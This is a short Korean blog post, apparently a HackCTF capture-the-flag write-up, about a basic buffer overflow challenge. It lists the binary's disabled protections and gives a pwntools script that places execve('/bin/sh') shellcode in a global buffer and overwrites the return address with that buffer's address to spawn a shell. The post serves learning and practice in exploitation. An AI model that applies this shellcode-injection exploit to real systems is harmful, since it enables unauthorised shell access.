반응형
 포스팅 썸네일 이미지

War Games/hack-ctf

[hackctf] 내 버퍼가 흘러넘친다

문제 소스 보호기법 gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : disabled PIE : disabled RELRO : Partial 문제 분석 및 페이로드 from pwn import * context.arch='x86' p=process("./prob1") e=ELF("./prob1") name=e.symbols['name'] shell=asm(shellcraft.execve("/bin/sh",0,0)) pay="A"*24 pay+=p32(name) p.sendafter("Name : ",shell) p.sendlineafter("input : ",pay) 참고문헌 및 힘들었던 부분

2021.04.18 게시됨

반응형